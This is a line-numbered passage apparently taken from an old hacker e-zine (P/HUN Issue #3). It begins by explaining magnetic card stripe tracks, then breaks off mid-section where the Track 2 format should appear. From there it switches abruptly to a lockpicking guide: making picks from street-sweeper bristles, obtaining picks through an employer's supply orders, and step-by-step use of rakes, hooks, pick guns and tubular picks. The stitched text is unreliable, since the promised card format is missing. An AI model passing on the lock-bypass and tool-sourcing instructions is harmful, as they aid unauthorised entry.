  5429. strip has the ability to hold multiple "tracks" or bands of encoded data.
  5430. There are 3 valid tracks.  Track 1 is the track nearest to the top of the
  5431. card, and it is followed by Tracks 2 and 3.  The original specifications
  5432. allowed for Tracks 1 and 2 only, and they are both read-only.  The
  5433. additional Track 3 furnishes an ability to read OR write.
  5434.  
  5435.  
  5436.                                TRACK 1
  5437.  
  5438.  
  5439. The International Airlines Transport Association originated the development
  5440. of Track 1 as the official track airline use and, in fact, it defined the
  5441. data and encoding formats for the ANSI standard.  This track was originally
  5442. designed to allow the use of customer-operated ticket dispensing machines
  5443. to cut down the traffic at airport ticket counters.
  5444.  
  5445. Now, many other parties make use of Track 1 because it is the only encoded
  5446. track that permits encoding of the card holder's name.  With this alphanumeric
  5447. capacity, the card holder's name can be printed on an EFT terminal receipt
  5448. rather cheaply, otherwise the name would have to be sent the computer, which
  5449. would be more costly and would take more time.
  5450.  
  5451. There are 26 formats for Track 1, and they are designated by codes from "A" to
  5452. "Z".  Format "B" is shown below.
  5453.  
  5454. Field Name                                        Length(chars)
  5455.  
  5456. Start sentinel                                        1
  5457. Format code = "B"                                1 (alpha only)
  5458. Primary account number                                Up to 19
  5459. Separator (SEP)                                        1
  5460. Country code                                        3
  5461. Name                                                2 to 26
  5462.         Surname
  5463.         Surname SEP = "/"
  5464.         First name or initial
  5465.         Space (when required)
  5466.         Middle name or initial
  5467.         Period (when followed by title)
  5468.         Title (when used)
  5469. SEP                                                1
  5470. Expiration date or SEP                                4 or 1
  5471. Discretionary data                                balance up to maximum
  5472.                                                 track length
  5473. End sentinel                                        1
  5474. Longitudinal Redundancy Check (LRC)                1
  5475.  
  5476. MAXIMUM TRACK LENGTH                                79
  5477.  
  5478. Format code "A" is reserved for proprietary use by the card issuer.  Format
  5479. codes "C" through "M" are reserved by ANSI for use in other data formats of
  5480. Track 1.  Format codes "N" through "Z" are available for use by individual
  5481. card issuers.
  5482.  
  5483.  
  5484.                                TRACK 2
  5485.  
  5486.  
  5487. The American Bankers Association led to the development of Track 2 on behalf
  5488. of two credit card companies (Interbank and VISA) and their members.  The
  5489. intent was to have a standardized plastic card which could be used at point-
  5490. of-sale (POS) terminals to obtain authorization for credit card transactions.
  5491.  
  5492. Today, in the financial industry, Track 2 is the most widely used encoding
  5493. method for plastic cards.  It has a strong following because most EFT
  5494. terminals are connected directly to a computer that accesses the cardholder's
  5495. data files.  Also, it is the preferred choice of the ABA and is the only track
  5496. recognized and supported by MasterCard and VISA.
  5497.  
  5498. The format of Track 2 is shown below.
  5499.  
  5500. You can call, or write, or if you can find a local locksmith supply house, they
  5501. may have copies available.
  5502. Note that the drawings, allthough detailed, are smaller than the actual tools,
  5503. but the size tends to be obvious.
  5504. NOTE:The correct size of a HPC pick handle is about 3 and 1/8 inches long.
  5505. If you have the the HPC drawings enlarged at a copy shop to just under 3x then
  5506. they will be of a useable size(If they can't do odd size enlargements, 3x
  5507. should be close enough.
  5508.  
  5509. B:MATERAL:Many materials are suitable for making picking tools/tension tools
  5510. 1.Gutter broom bristles(those *BIG* trucks with the rotary brushes that wash
  5511. and sweep the street at the same time). Look for the bristles after the truck
  5512. leaves...generally at least a few break off...it is preferable to look near a
  5513. irregular spot of the road, as this tends to induce bristle breakage.
  5514. Also, depending on your area, you may find that smaller trucks are used along
  5515. with the larger ones...these generally use thinner bristles, which make better
  5516. picks, but many times, the thicker type makes better tension wrenches
  5517. NOTE:A Package of strips/round strips of spring steel can be obtained from a
  5518. locksmith supply house, but you will pay at least $18.00 for this!
  5519. NOTE:If you *really* to buy the tools..there 3 ways to go...
  5520. 1.Try to order them through the mail..allthough the feds have been trying to
  5521. pass a bill prohibiting mailing picks, and door opening tools,  unless you can
  5522. prove you are a bona-fide locksmith(not as hard as you might think)..THIS BILL
  5523. HAS NOT PASSED AS OF YET. Also..the last time I checked am issue of HIGH TIMES
  5524. , there was a small advertisment in the back, and they had a pick set(for about
  5525. twice the price as the item's standard retail price.
  5526. 2.Try to work for a store/shop that has a locksmiths license(*NOT* a keymakers
  5527. license).
  5528. Sooner or later they will ask you to pick up supplies..if the supplier has what
  5529. you need, then you can add the items to the order.
  5530. 3.try and make friends with a locksmith..he can get you tools.
  5531.  
  5532. ---------------
  5533. TOOLS REQUIRED:
  5534. ---------------
  5535. If you are trying to make your own picks these tools are a good start...
  5536. 1.A set of warding files(these are often available in the tool department of
  5537. large discount stores...For example, for people in NYC, a chain of stores
  5538. called Webers tends to have these at a good price.
  5539. While you can buy a set from a locksmith supply house, you will pay at least
  5540.  $20.00-$30.00 for a small set.
  5541. The discount store ones are generally $3.00-$5.00 a set.
  5542. While the quality is a bit lower, at least from my experience they do the job
  5543. ok.
  5544. 2.A small propane or butane torch(if butane, one that can be refilled with a
  5545. can of cigarette lighter butane will be a lot cheaper to operate.
  5546. Note:a gas(but NOT a electric)kitchen stove burner will often do in a pinch.
  5547.  
  5548. ------------------
  5549. HOW TO MAKE TOOLS:
  5550. ------------------
  5551. First, let's assume that you are starting with gutter broom bristles, as they
  5552. are generally easy to get, and cost nothing..
  5553. First, let's start with a tension wrench...
  5554. Take a piece about 4-5 inches long, and make a sharp bend 1/4-1/2 inch from
  5555. the end(but DON'T make the bend so sharp that the strip cracks(if you want to
  5556. make a sharp bend, heat the strip at the point that you want to bend to red
  5557. heat and let it AIR COOL do not cool in fluid, as this will make the metal
  5558. harder!        After, if you want to reharden it, reheat, and plunge it into eit
  5559. oil or water(oil is better). If this results in the metal getting too hard,
  5560. then try cooling it a little slower. A book on metal working may be useful.
  5561. Also, if you want to make a complicated bend(a half twist, for example)then
  5562. heating the strip at the bend point will allow easy bending(this is one of
  5563. those times where a kitchen gas stove probably will not quite make it.
  5564.  
  5565.  
  5566. PICKS...You need pictures or drawings
  5567. (preferably full size).
  5568. Once you have these, select a piece of metal, soften about 2-3 inches using
  5569. a torch or gas burner, then get out your warding files and get to it!
  5570. NOTE:While in theory, you probably could file the strips without softening
  5571. them first, the metal is hardened, and resists being filed(this is also rough
  5572. on the files). What may help, whether you soften or not, is that a metal
  5573. nibbling tool can used for the rough shaping, and in some cases, can be used
  5574. to do most of the work. However you do it, it may be advisable to file the 2
  5575. flat sides of the tool(just a bit).
  5576.  
  5577.  
  5578. PART 5 USE OF TOOLS:
  5579. --------------------
  5580. The use of lockpicking tools is as much an art as it is a skill, but most
  5581. persons with enough practice can learn to do a decient job.
  5582.  
  5583. A good book on the subject comes from HPC(again)(Basic Picking and Raking.
  5584. This runs around $15.00), this is a bit overpriced, but a good guide.
  5585. But, let's go on......
  5586.  
  5587.  
  5588. Hand picks:
  5589. -----------
  5590. There are 4 different types of picks
  5591. The rake
  5592. The hook(this has other names as well)
  5593. The diamond
  5594. The ball/double ball(2 balls stacked)
  5595.  
  5596. The rake:
  5597. ---------
  5598. The rake is prehaps the easiest tool to use, but it does not teach you much
  5599. about the lock you are working on;if this does not matter to you, then don't
  5600. worry about it. Hold the cylinder or padlock in a upright position(the way
  5601. it normally be mounted). The pins should be on the top.
  5602. Hold the pick with the more prominent wiggly side up(the hollow side down).
  5603. Tilt the back of the handle downward a bit;the wiggly part should be
  5604. horizontal. Now put it down for a minute, and pick up a tension wrench(L shaped
  5605. piece), and insert the shorter bent end into the bottom of the keyway.
  5606. Now..
  5607. Rotate the wrench in the direction that the lock normally rotates to open-if
  5608. not sure-pick a direction.
  5609. Then..hold the pick so that the handle is angled towards you slightly;at this
  5610. angle the curved part should be horizontal. Insert the pick into the lock all
  5611. of the way into the keyway, and making sure that contact is attained with the
  5612. pins. Draw it out..repeat until lock is open. But..don't push the pins up by
  5613. forcing the pick upward with great force...not only will this not open the
  5614. lock, but you will bend the pick as well.
  5615. If it does not open:
  5616. First, release the tension(you should hear the pins drop).
  5617. 1.Try less(or more)tension on the tension wrench(NOTE:most problems are caused
  5618.  by too much tension).
  5619. 2.Try holding the pick at a slightly different angle and/or height.
  5620. 3.Try picking the lock in the other direction.
  5621.  
  5622. The hook:
  5623. ---------
  5624. The hook is used to lift individual pins in a cylinder.
  5625. The tension wrench is inserted and rotated the same way as above.
  5626. After putting tension on the wrench, insert the hook into the keyway with the
  5627. hook upward. Then, starting from the rearmost pins, lift each pin.
  5628. To do this:Lift the pin until you feel a bump, or a "click", or a change in
  5629. the spring action of the pin then STOP and go to the next pin.
  5630. Continue this until the lock opens.
  5631. If it does not open release the tension then:
  5632. 1.Try with more or less tension(NOTE:usually the problem is too much tension,
  5633.   so try lowering it first).
  5634. 2.Try starting from the front pins, instead of the back ones.
  5635. 3.Try picking the lock in the other direction.
  5636.  
  5637. The diamond:
  5638. ------------
  5639. This tool is used the same way as the rake, as it is a modified rake design,
  5640. although it does not look the same.
  5641.  
  5642. The ball/double ball:
  5643. ---------------------
  5644. These tools are mainly used for picking wafer tumbler locks.
  5645. They are used the same way as the rake, except these locks open *so* easily,
  5646. that you probably won't have to worry about the lock not opening.
  5647. NOTE:these locks can often be open in a pinch by using a bent paper clip(rake
  5648. the wafers and rotate the clip at the same time)
  5649.  
  5650. PICK GUNS:
  5651. ----------
  5652. The most difficult part about using a pick gun is not using it, but getting the
  5653. damm thing in the first place. They are available from most of the same places
  5654. that hand picks are sold, but unlike hand picks, are not readily made at home.
  5655. If you manage to get one(the best one, at least in my opinion, is the LOCKAID.
  5656. This pick is made by a company called majestic.
  5657. It is made very well, has an ajustable strike force dial, and has a LIFETIME
  5658. warranty!
  5659.  
  5660. Well, let's assume you have one of these tools...
  5661. Well the first thing is to get a lock(a small padlock is a good practice item)
  5662. then...
  5663. 1.insert the tension wrench at the bottom of the keyway, and rotate it in the
  5664.  direction that the lock opens.
  5665. 2.starting with the pick gun's tension dial set either to 0 or 1(0=the point
  5666.  that the dial will go no lower)(1=1 full turn in the opposite direction), take
  5667.  the pick gun and insert it's needle into the keyway, but try not to insert it
  5668.  beyond the pins, as the needle may bind. Holding the tool horizontal, squeeze
  5669.  the trigger. Do this 6-8 times, if no results then release the tension(on the
  5670.  cylinder), raise the pick gun's tension dial 1 full turn, and try to open the
  5671.  lock again. Keep trying until you get it open.
  5672.  
  5673.  
  5674. TUBULAR LOCK PICKS:
  5675. -------------------
  5676.  
  5677. The best guide to using a tubular lock pick, is the instructions that come with
  5678. it. However, as these may not be available, these general notes will get you
  5679. started. Also HPC has a tutorial on using tubular lock picks(Basic Picking and
  5680. Servicing Tubular Locks) (a bit costly, but if it is as good as other HPC
  5681. tutorials I've seen, it may be worth it).
  5682.  
  5683. GENERAL INSTRUCTIONS:
  5684. ---------------------
  5685.  
  5686. 1. Take the pick and slide the feelers(the moveable tines) back and forth a few
  5687.  times. Slide all of them (usually 7) out past the end of the tool a bit(maybe
  5688.  1/8th of a inch or so). Then press the tool aginst a hard surface until all of
  5689.  the feelers are flush with the end of the tool.
  5690. 2.Insert the tool into the front of the lock and gently push it all of the way
  5691.  into the lock.
  5692.  Then rotate the tool in the direction required for opening, but use a minimum
  5693.  of force, as excessive force will cause 2 difficulties:
  5694. 1.The front of the pick may be damaged.
  5695. 2.The lock may not be able to be open at all, or if it can it may be damaged.
  5696. After rotating the pick, slowly pump it in and out of the lock but note that
  5697. the pick should only be backed out about 1/8 inch or so.
  5698. Keep doing this;eventually the lock should open.
  5699. If not...start again from the start.
  5700.  
  5701.  
  5702.  
  5703. =-=-=-[ End of P/HUN Issue #3 :: Hacker's Den BBS (718)358/9209 ]-=-=-=-=-=-=-=
  5704.  
  5705.